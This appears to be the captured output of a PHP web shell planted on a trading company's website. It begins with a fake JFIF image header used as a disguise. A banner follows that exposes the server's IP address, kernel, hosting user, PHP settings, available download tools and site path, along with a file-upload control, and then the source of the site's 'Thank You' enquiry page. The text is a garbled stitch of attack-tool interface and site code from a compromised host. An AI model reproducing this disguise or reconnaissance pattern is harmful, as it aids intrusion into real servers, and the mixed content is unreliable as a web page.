���� JFIF fdasasfas213sdaf
Server IP : 88.222.243.232 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/shreeshaamtrading.in/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Shree Shaam Trading Co.</title> <?php include 'assets.php' ?> </head> <body class="style-2"> <?php include 'header.php' ?> <section class="section" style="background-image: url(img/about-banner.jpg)"> <div class="container"> <div class="row"> <div class="col-lg-12 text-center"> <ul> <li>Thank You</li> <li><a href="index.php">Home/</a>Thank You </li> </ul> </div> </div> </div> </section> <!-- About Start --> <section class="thank-you mb-5"> <h1 class="text-success">Thank You!</h1> <p>Your Enquiry has been submitted successfully. </p> </section> <style> .thank-you{padding: 80px 0; text-align: center;} .thank-you h1{font-size: 60px; } .thank-you p{font-size: 20px; font-weight: 700;} </style> <!-- About End --> <?php include('footer.php')?>